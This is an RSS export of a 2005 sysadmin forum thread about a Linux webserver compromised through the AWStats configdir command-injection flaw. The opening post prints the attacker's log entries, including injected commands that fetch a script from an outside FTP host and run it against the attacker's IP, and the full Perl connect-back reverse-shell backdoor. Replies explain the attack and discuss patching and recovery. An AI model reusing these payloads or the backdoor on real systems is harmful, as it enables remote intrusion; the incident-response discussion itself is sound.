<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns:taxo="http://purl.org/rss/1.0/modules/taxonomy/" version="2.0">
  <channel>
    <title>topic Re: Webserver hacked via a perl script in Operating System - Linux</title>
    <link>https://community.hpe.com/t5/operating-system-linux/webserver-hacked-via-a-perl-script/m-p/4896865#M45530</link>
    <description>With my limited knowledge, it looks like it opens a TCP session on port 80 and runs bah shell. Would be good if you put this in sysadmin and wait for pricura's reply.</description>
    <pubDate>Tue, 19 Apr 2005 11:06:29 GMT</pubDate>
    <dc:creator>RAC_1</dc:creator>
    <dc:date>2005-04-19T11:06:29Z</dc:date>
    <item>
      <title>Webserver hacked via a perl script</title>
      <link>https://community.hpe.com/t5/operating-system-linux/webserver-hacked-via-a-perl-script/m-p/4896864#M45529</link>
      <description>And I thought I had my Linux server locked down really hard.&lt;BR /&gt;&lt;BR /&gt;Anyways - to the point...&lt;BR /&gt;&lt;BR /&gt;I use a program called awstats to produce web/email stats for my server.  It is a perl script - in it's own directory.  What the script kiddie did:&lt;BR /&gt;&lt;BR /&gt;grep 200.164.155.211 access_log.1&lt;BR /&gt;200.164.155.211 - - [16/Apr/2005:20:03:19 -0700] "GET /awstats/awstats.pl?configdir=|echo%20;echo%20;id;echo%20;echo| HTTP/1.0" 200 502&lt;BR /&gt;200.164.155.211 - - [16/Apr/2005:20:04:00 -0700] "GET /awstats/awstats.pl?configdir=|echo%20;echo%20__comeco__;%20uname%20-a;%20id;%20pwd%20;echo%20__fim__;echo%20| HTTP/1.1" 200 676&lt;BR /&gt;200.164.155.211 - - [16/Apr/2005:20:05:59 -0700] "GET /awstats/awstats.pl?configdir=|echo%20;echo%20__comeco__;%20cd%20/tmp%20;%20%20%20(echo%20quote%20user%20digital00;%20%20echo%20quote%20pass%20crack80;%20echo%20bin;%20%20echo%20get%20dc.pl;%20echo%20bye)%20|%20ftp%20-n%20ftp.hpg.com.br%20;echo%20__fim__;echo%20| HTTP/1.1" 200 615&lt;BR /&gt;200.164.155.211 - - [16/Apr/2005:20:06:32 -0700] "GET /awstats/awstats.pl?configdir=|echo%20;echo%20__comeco__;%20cd%20/tmp%20;%20%20perl%20dc.pl%20;echo%20__fim__;echo%20| HTTP/1.1" 200 571&lt;BR /&gt;200.164.155.211 - - [16/Apr/2005:20:06:57 -0700] "GET / HTTP/1.1" 200 10623&lt;BR /&gt;200.164.155.211 - - [16/Apr/2005:20:07:00 -0700] "GET /templates/met/css/template_css.css HTTP/1.1" 200 7296&lt;BR /&gt;200.164.155.211 - - [16/Apr/2005:20:07:03 -0700] "GET /editor/htmlarea2/editor.js HTTP/1.1" 200 46954&lt;BR /&gt;200.164.155.211 - - [16/Apr/2005:20:07:11 -0700] "GET /templates/met/images/met_back.png HTTP/1.1" 200 287&lt;BR /&gt;200.164.155.211 - - [16/Apr/2005:20:07:12 -0700] "GET /templates/met/images/mt_menu_back.jpg HTTP/1.1" 200 9080&lt;BR /&gt;200.164.155.211 - - [16/Apr/2005:20:07:15 -0700] "GET /templates/met/images/arrow.png HTTP/1.1" 200 169&lt;BR /&gt;200.164.155.211 - - [16/Apr/2005:20:07:17 -0700] "GET /templates/met/images/met_bottom.png HTTP/1.1" 200 7146&lt;BR /&gt;200.164.155.211 - - [16/Apr/2005:20:07:11 -0700] "GET /templates/met/images/met_top.png HTTP/1.1" 200 35754&lt;BR /&gt;200.164.155.211 - - [16/Apr/2005:20:07:39 -0700] "GET /awstats/awstats.pl?configdir=|echo%20;echo%20__comeco__;%20cd%20/tmp%20;%20%20perl%20dc.pl%20200.164.155.211%20666%20;echo%20__fim__;echo%20| HTTP/1.1" 200 637&lt;BR /&gt;200.164.155.211 - - [16/Apr/2005:20:09:06 -0700] "GET /awstats/awstats.pl?configdir=|echo%20;echo%20__comeco__;%20cd%20/tmp%20;%20%20perl%20dc.pl%20200.164.155.211%20666%20;echo%20__fim__;echo%20| HTTP/1.1" 200 637&lt;BR /&gt;200.164.155.211 - - [16/Apr/2005:20:10:11 -0700] "GET / HTTP/1.1" 200 2&lt;BR /&gt;200.164.155.211 - - [16/Apr/2005:20:11:13 -0700] "GET / HTTP/1.1" 200 50&lt;BR /&gt;&lt;BR /&gt;Interesting - lucky for me - I was on the server when this was happening - and noticed perl running as apache taking up 95% cpu...&lt;BR /&gt;&lt;BR /&gt;Killed it then discovered my main web page had the following message:&lt;BR /&gt;&lt;BR /&gt;core-project owned you.. help? gridrunk@gmail.com&lt;BR /&gt;&lt;BR /&gt;I deleted /tmp/dc.pl as well as add htaccess to the awststs bin directory...&lt;BR /&gt;&lt;BR /&gt;I also ran a chkrootkit - to make sure nothing else was changed..&lt;BR /&gt;&lt;BR /&gt;Can someone explain exactly what this script does:&lt;BR /&gt;&lt;BR /&gt;more /tmp/dc.pl&lt;BR /&gt;#!/usr/bin/perl&lt;BR /&gt;use Socket;&lt;BR /&gt;print "Data Cha0s Connect Back Backdoor\n\n";&lt;BR /&gt;if (!$ARGV[0]) {&lt;BR /&gt;  printf "Usage: $0 [Host] &lt;PORT&gt;\n";&lt;BR /&gt;  exit(1);&lt;BR /&gt;}&lt;BR /&gt;print "[*] Dumping Arguments\n";&lt;BR /&gt;$host = $ARGV[0];&lt;BR /&gt;$port = 80;&lt;BR /&gt;if ($ARGV[1]) {&lt;BR /&gt;  $port = $ARGV[1];&lt;BR /&gt;}&lt;BR /&gt;print "[*] Connecting...\n";&lt;BR /&gt;$proto = getprotobyname('tcp') || die("Unknown Protocol\n");&lt;BR /&gt;socket(SERVER, PF_INET, SOCK_STREAM, $proto) || die ("Socket Error\n");&lt;BR /&gt;my $target = inet_aton($host);&lt;BR /&gt;if (!connect(SERVER, pack "SnA4x8", 2, $port, $target)) {&lt;BR /&gt;  die("Unable to Connect\n");&lt;BR /&gt;}&lt;BR /&gt;print "[*] Spawning Shell\n";&lt;BR /&gt;if (!fork( )) {&lt;BR /&gt;  open(STDIN,"&amp;gt;&amp;amp;SERVER");&lt;BR /&gt;  open(STDOUT,"&amp;gt;&amp;amp;SERVER");&lt;BR /&gt;  open(STDERR,"&amp;gt;&amp;amp;SERVER");&lt;BR /&gt;  exec {'/bin/sh'} '-bash' . "\0" x 4;&lt;BR /&gt;  exit(0);&lt;BR /&gt;}&lt;BR /&gt;print "[*] Datached\n\n";&lt;BR /&gt;&lt;BR /&gt;Looks like it creates a root bash session on port 80!&lt;BR /&gt;&lt;BR /&gt;Rgds...Geoff&lt;BR /&gt;&lt;BR /&gt;&lt;/PORT&gt;</description>
      <pubDate>Tue, 19 Apr 2005 10:16:59 GMT</pubDate>
      <guid>https://community.hpe.com/t5/operating-system-linux/webserver-hacked-via-a-perl-script/m-p/4896864#M45529</guid>
      <dc:creator>Geoff Wild</dc:creator>
      <dc:date>2005-04-19T10:16:59Z</dc:date>
    </item>
    <item>
      <title>Re: Webserver hacked via a perl script</title>
      <link>https://community.hpe.com/t5/operating-system-linux/webserver-hacked-via-a-perl-script/m-p/4896865#M45530</link>
      <description>With my limited knowledge, it looks like it opens a TCP session on port 80 and runs bah shell. Would be good if you put this in sysadmin and wait for pricura's reply.</description>
      <pubDate>Tue, 19 Apr 2005 11:06:29 GMT</pubDate>
      <guid>https://community.hpe.com/t5/operating-system-linux/webserver-hacked-via-a-perl-script/m-p/4896865#M45530</guid>
      <dc:creator>RAC_1</dc:creator>
      <dc:date>2005-04-19T11:06:29Z</dc:date>
    </item>
    <item>
      <title>Re: Webserver hacked via a perl script</title>
      <link>https://community.hpe.com/t5/operating-system-linux/webserver-hacked-via-a-perl-script/m-p/4896866#M45531</link>
      <description>Anil - post to sysadmin? which sysadmin?&lt;BR /&gt;&lt;BR /&gt;Thanks...Geoff</description>
      <pubDate>Tue, 19 Apr 2005 11:58:06 GMT</pubDate>
      <guid>https://community.hpe.com/t5/operating-system-linux/webserver-hacked-via-a-perl-script/m-p/4896866#M45531</guid>
      <dc:creator>Geoff Wild</dc:creator>
      <dc:date>2005-04-19T11:58:06Z</dc:date>
    </item>
    <item>
      <title>Re: Webserver hacked via a perl script</title>
      <link>https://community.hpe.com/t5/operating-system-linux/webserver-hacked-via-a-perl-script/m-p/4896867#M45532</link>
      <description>I mean post on hp-ux sysadmin section or may be under language 7 script section.</description>
      <pubDate>Tue, 19 Apr 2005 12:28:05 GMT</pubDate>
      <guid>https://community.hpe.com/t5/operating-system-linux/webserver-hacked-via-a-perl-script/m-p/4896867#M45532</guid>
      <dc:creator>RAC_1</dc:creator>
      <dc:date>2005-04-19T12:28:05Z</dc:date>
    </item>
    <item>
      <title>Re: Webserver hacked via a perl script</title>
      <link>https://community.hpe.com/t5/operating-system-linux/webserver-hacked-via-a-perl-script/m-p/4896868#M45533</link>
      <description>This is what happened, you run a version of awstats.pl that does not check the input of configdir, the kid tested first to see what output was given "uname -a", probably saw that the kernel root privilege escalation exploit existed ( ie. &amp;lt; kernel 2.4.24 I think fixed that bug ), and then proceeded to get awstats to download data chaos's back door shell spawning perl script which opens a connection back to the attack on whatever port they choose.&lt;BR /&gt;&lt;BR /&gt;Port 20666&lt;BR /&gt;&lt;BR /&gt;this is the command that was run from awstats.pl&lt;BR /&gt;&lt;BR /&gt;perl dc.pl 200.164.155.211 20666&lt;BR /&gt;&lt;BR /&gt;Which means that the shell would have been run as apache or httpd user depending on your distro.  If you have the kernel bug its just a matter of running the privilege exploit to turn an httpd shell into a root shell.&lt;BR /&gt;&lt;BR /&gt;To find out who owns that IP we turn to our global IP registry, in this case the IP is a LACNIC address, so on their whois page ( lacnic.net ) we run a check on that IP and it turns out to be a brazilian IP address ( surprise surprise ).  Give their NOC a call, and you'll figure out why brazil has so many hackers.&lt;BR /&gt;&lt;BR /&gt;I hope that sheds a little light on the problem.  Also look for an update to awstats.pl secunia has the details of the exploit, apparently the privilege escalation is due to awstats, not the kernel, but you should check your kernel version as well.&lt;BR /&gt;&lt;BR /&gt;&lt;A href="http://secunia.com/advisories/14299/" target="_blank"&gt;http://secunia.com/advisories/14299/&lt;/A&gt;&lt;BR /&gt;&lt;BR /&gt;--Dave</description>
      <pubDate>Tue, 19 Apr 2005 15:27:23 GMT</pubDate>
      <guid>https://community.hpe.com/t5/operating-system-linux/webserver-hacked-via-a-perl-script/m-p/4896868#M45533</guid>
      <dc:creator>Dave Falloon</dc:creator>
      <dc:date>2005-04-19T15:27:23Z</dc:date>
    </item>
    <item>
      <title>Re: Webserver hacked via a perl script</title>
      <link>https://community.hpe.com/t5/operating-system-linux/webserver-hacked-via-a-perl-script/m-p/4896869#M45534</link>
      <description>You know about "perl -wT", tainting, and all that? "-T" will make sure that input to a perl script is sanitized for your protection. The hoops you have to go through to make untainted copies of the user data are a big help in preventing "bad" (malicious and otherwise) data in GETs and POSTs form causing problems.&lt;BR /&gt;&lt;BR /&gt;The script would not fork a root shell unless you were running Apache as root, unless it takes advantage of an Apache bug (I don't know those off the top of my head.) But then you must assume any malicious non-root user on your system can get root by whatever other means. Or at least put a non-root back door in your system as this guy did.</description>
      <pubDate>Tue, 19 Apr 2005 15:50:57 GMT</pubDate>
      <guid>https://community.hpe.com/t5/operating-system-linux/webserver-hacked-via-a-perl-script/m-p/4896869#M45534</guid>
      <dc:creator>W Sanders_1</dc:creator>
      <dc:date>2005-04-19T15:50:57Z</dc:date>
    </item>
    <item>
      <title>Re: Webserver hacked via a perl script</title>
      <link>https://community.hpe.com/t5/operating-system-linux/webserver-hacked-via-a-perl-script/m-p/4896870#M45535</link>
      <description>Found some more info here&lt;BR /&gt;&lt;BR /&gt;&lt;A href="http://blogs.ittoolbox.com/security/investigator/archives/003227.asp" target="_blank"&gt;http://blogs.ittoolbox.com/security/investigator/archives/003227.asp&lt;/A&gt;&lt;BR /&gt;&lt;A href="http://www.hostpc.com/forums/lofiversion/index.php/t1909.html" target="_blank"&gt;http://www.hostpc.com/forums/lofiversion/index.php/t1909.html&lt;/A&gt;&lt;BR /&gt;&lt;BR /&gt;Just go to show how prudent one has to be theses days...&lt;BR /&gt;&lt;BR /&gt;J-P Huc</description>
      <pubDate>Tue, 19 Apr 2005 16:10:47 GMT</pubDate>
      <guid>https://community.hpe.com/t5/operating-system-linux/webserver-hacked-via-a-perl-script/m-p/4896870#M45535</guid>
      <dc:creator>Huc_1</dc:creator>
      <dc:date>2005-04-19T16:10:47Z</dc:date>
    </item>
    <item>
      <title>Re: Webserver hacked via a perl script</title>
      <link>https://community.hpe.com/t5/operating-system-linux/webserver-hacked-via-a-perl-script/m-p/4896871#M45536</link>
      <description>From awstats home page:&lt;BR /&gt;&lt;BR /&gt;"Warning, a security hole was recently found in AWStats versions from 5.0 to 6.2 when AWStats is used as a CGI: A remote user can execute arbitrary commands on your server using permissions of your web server user (in most cases user "nobody"). If you use AWStats with another version or with option AllowToUpdateStatsFromBrowser to 0, you are safe. If not, it is highly recommanded to update to 6.3 version that fix this security hole."</description>
      <pubDate>Tue, 19 Apr 2005 16:58:38 GMT</pubDate>
      <guid>https://community.hpe.com/t5/operating-system-linux/webserver-hacked-via-a-perl-script/m-p/4896871#M45536</guid>
      <dc:creator>W Sanders_1</dc:creator>
      <dc:date>2005-04-19T16:58:38Z</dc:date>
    </item>
    <item>
      <title>Re: Webserver hacked via a perl script</title>
      <link>https://community.hpe.com/t5/operating-system-linux/webserver-hacked-via-a-perl-script/m-p/4896872#M45537</link>
      <description>The security report for awstats says there is a privilege escalation exploit, but I don't know if it escalates to root permission.&lt;BR /&gt;&lt;BR /&gt;The guy left all his login information for his script repository, if you are in the US just fire off an email to the authorities and they'll take care of the rest.&lt;BR /&gt;&lt;BR /&gt;--Dave</description>
      <pubDate>Tue, 19 Apr 2005 17:02:50 GMT</pubDate>
      <guid>https://community.hpe.com/t5/operating-system-linux/webserver-hacked-via-a-perl-script/m-p/4896872#M45537</guid>
      <dc:creator>Dave Falloon</dc:creator>
      <dc:date>2005-04-19T17:02:50Z</dc:date>
    </item>
    <item>
      <title>Re: Webserver hacked via a perl script</title>
      <link>https://community.hpe.com/t5/operating-system-linux/webserver-hacked-via-a-perl-script/m-p/4896873#M45538</link>
      <description>Seems that this exploit gives the user the ability to do anything they want on the server, set up users, back doors, the works.&lt;BR /&gt;&lt;BR /&gt;If you don't have tripwire on this system, you might want to get tripwire on it and check all the binaries.&lt;BR /&gt;&lt;BR /&gt;SEP</description>
      <pubDate>Tue, 19 Apr 2005 23:28:18 GMT</pubDate>
      <guid>https://community.hpe.com/t5/operating-system-linux/webserver-hacked-via-a-perl-script/m-p/4896873#M45538</guid>
      <dc:creator>Steven E. Protter</dc:creator>
      <dc:date>2005-04-19T23:28:18Z</dc:date>
    </item>
    <item>
      <title>Re: Webserver hacked via a perl script</title>
      <link>https://community.hpe.com/t5/operating-system-linux/webserver-hacked-via-a-perl-script/m-p/4896874#M45539</link>
      <description>Yes making sure of all your files would be a must.&lt;BR /&gt;&lt;BR /&gt;If you can not start from scratch ! one way to do this, if you can get hold of the hardware is to restore from a full backup on an other system run tripewire on that.&lt;BR /&gt;&lt;BR /&gt;Install tripewire on live system, run it and compare results, analyze differences.&lt;BR /&gt;&lt;BR /&gt;This still would involve checking many, many files (even more so if backup is old) and trying to remember what has been happening since last backup !&lt;BR /&gt;&lt;BR /&gt;In parallel setup networking monitoring tools and analyze traffic! watch activity, a long process!&lt;BR /&gt;&lt;BR /&gt;perhaps scratch and reinstall/restore is easy and cheapest way out.&lt;BR /&gt;&lt;BR /&gt;J-P Huc&lt;BR /&gt;</description>
      <pubDate>Wed, 20 Apr 2005 05:51:48 GMT</pubDate>
      <guid>https://community.hpe.com/t5/operating-system-linux/webserver-hacked-via-a-perl-script/m-p/4896874#M45539</guid>
      <dc:creator>Huc_1</dc:creator>
      <dc:date>2005-04-20T05:51:48Z</dc:date>
    </item>
    <item>
      <title>Re: Webserver hacked via a perl script</title>
      <link>https://community.hpe.com/t5/operating-system-linux/webserver-hacked-via-a-perl-script/m-p/4896875#M45540</link>
      <description>Thanks for all the input - I hope this helps others as well.&lt;BR /&gt;&lt;BR /&gt;Just so you know - everything on my system was up2date - only awstats was at 6.0  :(&lt;BR /&gt;&lt;BR /&gt;My log dir on the web page was htaccessed - it was only the awstats bin that wasn't  :(&lt;BR /&gt;&lt;BR /&gt;I have upgraded awstats as well as no longer running it as root...&lt;BR /&gt;&lt;BR /&gt;I think I was "lucky" that I was on my server when it happened - before any real damage was done...&lt;BR /&gt;&lt;BR /&gt;I also run iptables - here a list of ip address ranges I block so far:&lt;BR /&gt;&lt;BR /&gt;#       class A         xxx.0.0.0/8             255.0.0.0&lt;BR /&gt;#       class B         xxx.xxx.0.0/16          255.255.0.0&lt;BR /&gt;#       class C         xxx.xxx.xxx.0/24        255.255.255.0&lt;BR /&gt;#       128 subnet      xxx.xxx.xxx.xxx/25      255.255.255.128&lt;BR /&gt;#        64 subnet      xxx.xxx.xxx.xxx/26      255.255.255.192&lt;BR /&gt;#        32 subnet      xxx.xxx.xxx.xxx/27      255.255.255.224&lt;BR /&gt;#        16 subnet      xxx.xxx.xxx.xxx/28      255.255.255.240&lt;BR /&gt;#         8 subnet      xxx.xxx.xxx.xxx/29      255.255.255.248&lt;BR /&gt;#         4 subnet      xxx.xxx.xxx.xxx/30      255.255.255.252&lt;BR /&gt;#         2 subnet      xxx.xxx.xxx.xxx/31      255.255.255.254&lt;BR /&gt;#       single address  xxx.xxx.xxx.xxx/32      255.255.255.255&lt;BR /&gt;# Drop everyting from the following ip's&lt;BR /&gt;echo "Process the bad people ..."&lt;BR /&gt;$IPT -A INPUT -p ALL -s 65.182.142.0/24 -j DROP&lt;BR /&gt;$IPT -A INPUT -p ALL -s 68.122.142.182 -j DROP&lt;BR /&gt;$IPT -A INPUT -p ALL -s 68.144.185.86 -j DROP&lt;BR /&gt;$IPT -A INPUT -p ALL -s 68.157.86.130 -j DROP&lt;BR /&gt;$IPT -A INPUT -p ALL -s 216.185.55.67 -j DROP&lt;BR /&gt;$IPT -A INPUT -p ALL -s 68.210.138.17 -j DROP&lt;BR /&gt;$IPT -A INPUT -p ALL -s 62.81.176.46 -j DROP&lt;BR /&gt;$IPT -A INPUT -p ALL -s 70.68.37.85 -j DROP&lt;BR /&gt;$IPT -A INPUT -p ALL -s 80.146.162.66 -j DROP&lt;BR /&gt;$IPT -A INPUT -p ALL -s 194.67.35.196 -j DROP&lt;BR /&gt;$IPT -A INPUT -p ALL -s 221.142.197.203 -j DROP&lt;BR /&gt;$IPT -A INPUT -p ALL -s 207.250.236.66 -j DROP&lt;BR /&gt;$IPT -A INPUT -p ALL -s 220.120.103.188 -j DROP&lt;BR /&gt;$IPT -A INPUT -p ALL -s 203.177.41.194 -j DROP&lt;BR /&gt;$IPT -A INPUT -p ALL -s 212.152.182.90 -j DROP&lt;BR /&gt;$IPT -A INPUT -p ALL -s 219.239.35.210 -j DROP&lt;BR /&gt;$IPT -A INPUT -p ALL -s 68.47.18.119 -j DROP&lt;BR /&gt;$IPT -A INPUT -p ALL -s 82.64.199.143 -j DROP&lt;BR /&gt;$IPT -A INPUT -p ALL -s 81.157.49.0/24 -j DROP&lt;BR /&gt;$IPT -A INPUT -p ALL -s 82.104.70.0/24 -j DROP&lt;BR /&gt;$IPT -A INPUT -p ALL -s 216.54.3.0/24 -j DROP&lt;BR /&gt;$IPT -A INPUT -p ALL -s 203.115.71.0/24 -j DROP&lt;BR /&gt;$IPT -A INPUT -p ALL -s 219.238.212.0/24 -j DROP&lt;BR /&gt;$IPT -A INPUT -p ALL -s 219.139.235.0/24 -j DROP&lt;BR /&gt;$IPT -A INPUT -p ALL -s 12.219.16.0/24 -j DROP&lt;BR /&gt;$IPT -A INPUT -p ALL -s 24.9.205.0/24 -j DROP&lt;BR /&gt;$IPT -A INPUT -p ALL -s 24.10.212.0/24 -j DROP&lt;BR /&gt;$IPT -A INPUT -p ALL -s 24.10.222.0/24 -j DROP&lt;BR /&gt;$IPT -A INPUT -p ALL -s 24.11.170.0/24 -j DROP&lt;BR /&gt;$IPT -A INPUT -p ALL -s 24.11.94.0/24 -j DROP&lt;BR /&gt;$IPT -A INPUT -p ALL -s 24.14.31.0/24 -j DROP&lt;BR /&gt;$IPT -A INPUT -p ALL -s 24.17.245.0/24 -j DROP&lt;BR /&gt;$IPT -A INPUT -p ALL -s 24.17.252.0/24 -j DROP&lt;BR /&gt;$IPT -A INPUT -p ALL -s 24.18.150.0/24 -j DROP&lt;BR /&gt;$IPT -A INPUT -p ALL -s 24.85.56.0/24 -j DROP&lt;BR /&gt;$IPT -A INPUT -p ALL -s 24.190.183.0/24 -j DROP&lt;BR /&gt;$IPT -A INPUT -p ALL -s 61.84.219.0/24 -j DROP&lt;BR /&gt;$IPT -A INPUT -p ALL -s 61.121.213.0/24 -j DROP&lt;BR /&gt;$IPT -A INPUT -p ALL -s 61.152.79.0/24 -j DROP&lt;BR /&gt;$IPT -A INPUT -p ALL -s 61.218.8.0/24 -j DROP&lt;BR /&gt;$IPT -A INPUT -p ALL -s 61.222.3.0/24 -j DROP&lt;BR /&gt;$IPT -A INPUT -p ALL -s 62.8.219.0/24 -j DROP&lt;BR /&gt;$IPT -A INPUT -p ALL -s 64.108.112.0/24 -j DROP&lt;BR /&gt;$IPT -A INPUT -p ALL -s 64.218.222.0/24 -j DROP&lt;BR /&gt;$IPT -A INPUT -p ALL -s 66.131.24.0/24 -j DROP&lt;BR /&gt;$IPT -A INPUT -p ALL -s 66.232.147.0/24 -j DROP&lt;BR /&gt;$IPT -A INPUT -p ALL -s 66.246.220.0/24 -j DROP&lt;BR /&gt;$IPT -A INPUT -p ALL -s 67.126.223.0/24 -j DROP&lt;BR /&gt;$IPT -A INPUT -p ALL -s 67.161.203.0/24 -j DROP&lt;BR /&gt;$IPT -A INPUT -p ALL -s 67.162.171.0/24 -j DROP&lt;BR /&gt;$IPT -A INPUT -p ALL -s 67.165.189.0/24 -j DROP&lt;BR /&gt;$IPT -A INPUT -p ALL -s 67.173.10.0/24 -j DROP&lt;BR /&gt;$IPT -A INPUT -p ALL -s 68.117.2.0/24 -j DROP&lt;BR /&gt;$IPT -A INPUT -p ALL -s 80.162.163.0/24 -j DROP&lt;BR /&gt;$IPT -A INPUT -p ALL -s 81.95.106.0/24 -j DROP&lt;BR /&gt;$IPT -A INPUT -p ALL -s 82.66.224.0/24 -j DROP&lt;BR /&gt;$IPT -A INPUT -p ALL -s 82.66.224.0/24 -j DROP&lt;BR /&gt;$IPT -A INPUT -p ALL -s 82.189.178.0/24 -j DROP&lt;BR /&gt;$IPT -A INPUT -p ALL -s 83.98.167.0/24 -j DROP&lt;BR /&gt;$IPT -A INPUT -p ALL -s 193.109.140.0/24 -j DROP&lt;BR /&gt;$IPT -A INPUT -p ALL -s 140.135.112.0/24 -j DROP&lt;BR /&gt;$IPT -A INPUT -p ALL -s 200.164.155.0/24 -j DROP&lt;BR /&gt;$IPT -A INPUT -p ALL -s 200.166.77.0/24 -j DROP&lt;BR /&gt;$IPT -A INPUT -p ALL -s 200.226.240.0/24 -j DROP&lt;BR /&gt;$IPT -A INPUT -p ALL -s 202.188.92.0/24 -j DROP&lt;BR /&gt;$IPT -A INPUT -p ALL -s 202.108.103.0/24 -j DROP&lt;BR /&gt;$IPT -A INPUT -p ALL -s 202.202.112.0/24 -j DROP&lt;BR /&gt;$IPT -A INPUT -p ALL -s 200.207.151.0/24 -j DROP&lt;BR /&gt;$IPT -A INPUT -p ALL -s 203.68.137.0/24 -j DROP&lt;BR /&gt;$IPT -A INPUT -p ALL -s 203.123.36.0/24 -j DROP&lt;BR /&gt;$IPT -A INPUT -p ALL -s 203.228.120.0/24 -j DROP&lt;BR /&gt;$IPT -A INPUT -p ALL -s 207.234.129.0/24 -j DROP&lt;BR /&gt;$IPT -A INPUT -p ALL -s 209.197.234.0/24 -j DROP&lt;BR /&gt;$IPT -A INPUT -p ALL -s 210.159.198.0/24 -j DROP&lt;BR /&gt;$IPT -A INPUT -p ALL -s 220.191.127.0/24 -j DROP&lt;BR /&gt;$IPT -A INPUT -p ALL -s 211.57.214.0/24 -j DROP&lt;BR /&gt;$IPT -A INPUT -p ALL -s 211.58.254.0/24 -j DROP&lt;BR /&gt;$IPT -A INPUT -p ALL -s 211.90.202.0/24 -j DROP&lt;BR /&gt;$IPT -A INPUT -p ALL -s 211.176.33.0/24 -j DROP&lt;BR /&gt;$IPT -A INPUT -p ALL -s 213.25.181.0/24 -j DROP&lt;BR /&gt;$IPT -A INPUT -p ALL -s 213.93.124.0/24 -j DROP&lt;BR /&gt;$IPT -A INPUT -p ALL -s 213.193.221.0/24 -j DROP&lt;BR /&gt;$IPT -A INPUT -p ALL -s 217.58.199.0/24 -j DROP&lt;BR /&gt;$IPT -A INPUT -p ALL -s 217.219.29.0/24 -j DROP&lt;BR /&gt;$IPT -A INPUT -p ALL -s 218.57.129.0/24 -j DROP&lt;BR /&gt;$IPT -A INPUT -p ALL -s 218.153.147.0/24 -j DROP&lt;BR /&gt;$IPT -A INPUT -p ALL -s 220.117.203.0/24 -j DROP&lt;BR /&gt;$IPT -A INPUT -p ALL -s 221.165.68.0/24 -j DROP&lt;BR /&gt;$IPT -A INPUT -p ALL -s 221.186.133.0/24 -j DROP&lt;BR /&gt;$IPT -A INPUT -p ALL -s 222.88.77.0/24 -j DROP&lt;BR /&gt;$IPT -A INPUT -p ALL -s 203.129.193.189 -j DROP&lt;BR /&gt;$IPT -A INPUT -p ALL -s 4.0.0.0/8 -j DROP&lt;BR /&gt;$IPT -A INPUT -p ALL -s 203.234.248/24 -j DROP&lt;BR /&gt;$IPT -A INPUT -p ALL -s 24.82.81.169 -j DROP&lt;BR /&gt;&lt;BR /&gt;&lt;BR /&gt;Rgds...Geoff</description>
      <pubDate>Wed, 20 Apr 2005 08:03:48 GMT</pubDate>
      <guid>https://community.hpe.com/t5/operating-system-linux/webserver-hacked-via-a-perl-script/m-p/4896875#M45540</guid>
      <dc:creator>Geoff Wild</dc:creator>
      <dc:date>2005-04-20T08:03:48Z</dc:date>
    </item>
    <item>
      <title>Re: Webserver hacked via a perl script</title>
      <link>https://community.hpe.com/t5/operating-system-linux/webserver-hacked-via-a-perl-script/m-p/4896876#M45541</link>
      <description>Closing.</description>
      <pubDate>Wed, 20 Apr 2005 08:05:26 GMT</pubDate>
      <guid>https://community.hpe.com/t5/operating-system-linux/webserver-hacked-via-a-perl-script/m-p/4896876#M45541</guid>
      <dc:creator>Geoff Wild</dc:creator>
      <dc:date>2005-04-20T08:05:26Z</dc:date>
    </item>
  </channel>
</rss>

